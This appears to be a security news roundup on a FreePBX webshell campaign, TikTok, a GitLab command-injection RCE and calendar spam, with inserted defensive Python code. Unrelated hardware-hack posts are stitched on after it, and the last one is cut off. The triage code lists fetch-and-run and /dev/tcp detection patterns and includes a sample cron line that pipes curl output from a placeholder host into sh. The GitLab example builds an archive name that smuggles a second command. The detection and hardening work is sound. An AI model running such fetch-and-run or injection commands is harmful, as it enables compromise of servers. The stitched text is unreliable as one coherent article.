This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

There’s an ongoing campaign that’s compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, using CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. This flaw was a 0-day, as it was discovered by analyzing a compromised FreePBX system. It’s unclear if the campaign described in last week’s report was using the 0-day back in December, or if it was launched as a result of the public disclosure of the bug.

Regardless, the vulnerability is triggered through a URL parameter sent to the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, letting end users set features like Do Not Disturb without punching in star codes or visiting a web page. Because of that use case, any FreePBX deployment that uses this feature and supports VoIP phones connecting from outside the network would need these ports open. The best way to secure that is to enforce connections over a VPN, which only some phones natively support.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, all obfuscated slightly differently. It then creates multiple root-level user accounts, and adds a Cron job to maintain access. There is a surprising amount of obfuscation and stealth features in this family of malware, making it difficult to point to a single Indicator Of Compromise. If you run a FreePBX system that may have the Phone Apps module running, it’s time to go through it with a fine-toothed comb.
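A defender-side triage pass for a FreePBX host, written for this article and not code from the campaign write-up; it checks the three traits described above (extra UID-0 accounts, cron persistence, obfuscated PHP webshells) against constructed sample inputs, and the webshell and cron patterns are assumed heuristics rather than indicators from the report.

```python
"""Post-compromise triage heuristics for a FreePBX host (added example).

Checks the campaign traits described above: extra UID-0 accounts, cron-based
persistence and obfuscated PHP webshells.  Inputs are plain text so the
functions run on constructed samples; on a real host feed them /etc/passwd,
`crontab -l` output and files under the FreePBX web root."""
import re

# Assumed heuristics, not indicators from the article: code execution fed by a
# decoder or straight from a request parameter.
WEBSHELL_PATTERNS = [
    r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    r"(eval|system|shell_exec|passthru|assert)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b",
    r"preg_replace\s*\(\s*['\"].*?/e['\"]",
]
# Cron entries that fetch-and-run remote content or carry an encoded payload.
CRON_PATTERNS = [r"(curl|wget)\b.*\|\s*(ba)?sh\b", r"base64\s+(-d|--decode)", r"/dev/tcp/"]

def extra_uid0_accounts(passwd_text: str) -> list[str]:
    """Return login names with UID 0 other than root (passwd(5) format)."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found

def suspicious_cron_lines(crontab_text: str) -> list[str]:
    """Return non-comment cron lines matching any persistence heuristic."""
    return [line for line in crontab_text.splitlines()
            if not line.strip().startswith("#")
            and any(re.search(p, line) for p in CRON_PATTERNS)]

def webshell_indicators(php_source: str) -> list[str]:
    """Return the heuristic patterns that match a PHP file's contents."""
    return [p for p in WEBSHELL_PATTERNS if re.search(p, php_source, re.S)]

# Constructed samples, not artefacts recovered from the campaign.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin\n"
                 "sysadm:x:0:0::/tmp:/bin/bash\n")
SAMPLE_CRON = ("# m h dom mon dow command\n"
               "0 3 * * * /usr/sbin/fwconsole ma refreshsignatures\n"
               "*/5 * * * * curl -s http://EXAMPLE-PLACEHOLDER/u.txt | sh\n")
SAMPLE_PHP = "<?php $x='aGk='; eval(base64_decode($x)); ?>"

if __name__ == "__main__":
    print("extra UID-0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
    print("suspicious cron lines:", suspicious_cron_lines(SAMPLE_CRON))
    print("webshell indicators:", webshell_indicators(SAMPLE_PHP))
```

Because the malware family varies its obfuscation, treat a hit as a reason to pull the file or account for manual review rather than as a verdict.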

What’s The Deal With TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both of them trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US-based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just go open up the Google Play Store and see the exact permissions the TikTok app uses, Google has made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems like Google agrees. Just before this article went to press, Google announced that they were walking back this decision.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so, that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can manipulate the value given for the archive name, and avoid tripping any of the checks intended to prevent it, you can trivially insert shell commands that will be run on the underlying server. Avoiding those traps is a big part of the work to actually turn this into a real PoC. Read the post for full details on the debugging journey.
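The bug class above, appending an untrusted archive name to a command string, shown beside its hardened forms as an added example written for this article (not GitLab's code); the tar invocation, the paths and the allowlist regex are assumptions.

```python
"""Shell-string versus argv construction for an archive-import step (added example).

The flaw above appended the archive name straight into a command string.  This
shows that pattern beside two defenses: an allowlist on the name, and passing the
name as one argv element so no shell ever parses it.  The tar invocation, paths and
allowlist are assumptions, not GitLab's code."""
import re
import shlex
import subprocess

ARCHIVE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.(tar\.gz|tgz|tar)$")

def build_shell_command_unsafe(archive_name: str) -> str:
    """Vulnerable pattern: input concatenated into a string that a shell will parse."""
    return "tar -xzf /tmp/imports/" + archive_name + " -C /tmp/extract"

def is_safe_archive_name(archive_name: str) -> bool:
    """Allowlist: letters, digits, dot, underscore, dash; no '/', no metacharacters."""
    return bool(ARCHIVE_NAME_RE.match(archive_name)) and ".." not in archive_name

def build_argv(archive_name: str) -> list[str]:
    """Hardened pattern: validated name placed in an argv list, never a shell string."""
    if not is_safe_archive_name(archive_name):
        raise ValueError(f"rejected archive name: {archive_name!r}")
    return ["tar", "-xzf", "/tmp/imports/" + archive_name, "-C", "/tmp/extract"]

def quoted_for_shell(archive_name: str) -> str:
    """Fallback when a shell string is unavoidable: shlex.quote neutralises metacharacters."""
    return "tar -xzf /tmp/imports/" + shlex.quote(archive_name) + " -C /tmp/extract"

def echo_argv_element(value: str) -> str:
    """Run echo with value as a single argv element; it comes back verbatim."""
    out = subprocess.run(["echo", value], capture_output=True, text=True, check=True)
    return out.stdout.rstrip("\n")

if __name__ == "__main__":
    hostile = "proj.tar.gz; echo injected"  # constructed hostile name
    print(build_shell_command_unsafe(hostile))  # a shell would run 'echo injected' here
    print(quoted_for_shell(hostile))            # quoted: one word to the shell
    print(echo_argv_element(hostile))           # argv: printed verbatim, nothing executed
    print(build_argv("proj.tar.gz"))            # accepted name, safe argv
```

The argv form is the real fix; the allowlist is defence in depth, since the write-up's point is that blacklist-style checks on the name were the traps that had to be worked around.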

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is Calendar spam. Google Calendar is great, because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect, it seems obvious that this would be used for spam. Regardless, after multiple years of the spam problem, Google is finally rolling out a feature to only add invitations to your calendar from known senders. Now if you get asked, or suffer from spam yourself, you know to look under event settings and make the change. Finally!

Now There’s USB-C On The iPhone SE

As confusing as it can be, USB-C is actually pretty good, and certainly has its fans. [David Buchanan] must be one of them, for he did a great job putting a USB-C port into his iPhone SE.

[David] didn’t want to ruin a pristine example, so set about hacking the cheapest first-gen iPhone SE he could find on eBay. His approach was simple: get a USB-C to Lightning dongle and hack it into the phone’s body.

The first step was to strip the adapter down and melt off the Lightning connector. He then de-soldered the Lightning port from the phone, and found a bunch of test pads on the motherboard corresponding to its pins. Soldering leads from the adapter to the test pads got things up and running, once he properly hooked up a connection-detect pin to ground.

With a bit more trimming, some hot glue and some enameled wire, [David] was able to cram everything inside the iPhone. Paired with a new screen and home button, he had an iPhone SE with a working USB-C port. It works for both charging and USB data, too.

If you’re rocking an iPhone SE, you might dig this conversion as it gives you access to more chargers out in the wild. Plus, you’ve still got the regular headphone jack. Be sure to check out the iPhone 13 with a USB C port, too. It’s the hottest new hack until the new EU regulations hit Apple in coming years.

Pet Docking Station Was Two Decades In The Making

There are some projects which once might have been entirely appropriate, but which now seem sacrilegious. [Dave Luna]’s PC docking station in a Commodore Pet 64 case might at first sight seem to be one of them, but there’s a little more to it than gutting a cherished retrocomputer.

A much younger [Dave] had a dead Pet 64, and because over two decades ago such a thing was considered junk, set about converting it to a PC case. In the way of all ambitious projects it stalled, so here in 2022 he was starting with the metal case and keyboard of a Pet 64 rather than the full computer.

Into the case went a small color TFT monitor, a USB3 hub, a DisplayLink adapter, and an Arduino Micro doing the job of USB-ifying the Commodore keyboard. The result is a pretty cool docking station, but one which he admits isn’t as nice to use as he’d like. Viewed through rose-tinted glasses any PET was an amazing machine in its day, but a slightly lackluster keyboard and a tiny screen don’t quite have the same allure in a world of 4K monitors. Still, we’d have one on our desk.

The Pet appears in quite a few projects that have made it to these pages, for example showing YouTube videos.


Turning The Back Of Your Phone Into A Touchpad

Smartphones use big touchscreens on the front as a useful tactile interface. However, our hands naturally wrap around the back of the phone, too. This area is underutilized as an interface, but the designers of BackTrack found a way to change that.

Touches on the 2D rear matrix are translated into a pair of touches on the linear line of pads on the front screen. This can then be reconstructed into the touch location on the rear touchpad.

The idea is simple. The project video notes that conductive tape can be placed on a multitouch touchscreen, allowing touches to be read at a remote location. Taking this concept further, BackTrack works by creating a 2D matrix on the back of the phone, and connecting this matrix to a series of pads in a row on the front touchscreen. Then, touches on the back touchpad can be read by the existing touchscreen on the front.

Design Cities In A Snap With Buildify

Designing 3D environments is hard, but it doesn’t have to be. A week ago, if you decided to design an entire city in Blender, say for a game or animation, you probably would have downloaded some asset pack full of building shapes and textures and painstakingly placed them over the course of days, modifying the models and making new ones as needed. Now, you would just need to download Buildify, feed it an asset pack, and watch the magic happen.

Buildify, made by [Pavel Oliva], is one of the most impressive bits of Blender content we’ve seen in a long time. It lets you generate entire cities by drawing the outlines of buildings. You can grab walls and resize individual structures, and the walls, windows, doors, textures, and everything else will automatically rearrange as needed. You can even select a region on Open Street Maps and watch as Buildify recreates the area in Blender using your chosen asset pack (maybe a KiCad PCB design could be used as the source material too?). It’s really something incredible to see, and you’ve just got to watch the video below to understand just how useful this tool can be.

The pay-what-you-want .blend file that you can grab off of [Pavel]’s website doesn’t include all the beautiful assets you can see in the video, but instead generates simple grey block buildings. He made one of the packs used in the video, and will be releasing it online for free soon. In the meantime, he links to other ones you can buy, or you can get really ambitious and create your own. We know it won’t be long until we’re seeing animations and games with Buildify-generated cities.


Reverse Engineering A Phased Array System Reveals Surprising Details

The term “phased array” has been around for a long time, but in recent years we’ve heard more and more about the beam shaping that’s possible with phased array antennae. In the video below the break, [The Signal Path] breaks down a Qualcomm 60GHz WiGig unit, and does a deep dive, even looking at the bare silicon and an x-ray of an antenna.

An X-Ray of the antenna shows the intricate design

Some fascinating highlights include how not only is the data signal sent to the antennae through a standard coaxial cable, but so are the control signals and a base clock frequency. [The Signal Path] explains how the manufacturer chose to use what’s called a superheterodyne (aka “superhet”) architecture, which is not all that different from those used in traditional amateur radio transceivers. In theory, anyway.

Another element that is discussed is how the PCBs themselves are used as waveguides, inductors, and transmission line matches, among countless other little hacks to fit a rather complex system into a truly diminutive space.

If you’re not familiar with the concept behind phased arrays, check out this article we published in 2019 that shows how phased arrays can steer a beam without any moving parts. It’s quite fascinating!


Simple Binary Watch Uses A PCB Body

There are many ways to tell the time, from using analog dials to 7-segment displays. Hackers tend to enjoy binary watches, if only for their association with the digital machines that seem to make the world turn these days. [Vishal Soni] decided to build one of their own.

It’s a straightforward design that uses six bits to show the time. A red light is illuminated at the top of the watch to indicate that the watch is showing minutes, and these are displayed in binary on the six blue LEDs below. Then the watch indicates it is showing hours, and again uses the six blue LEDs to show the relevant number.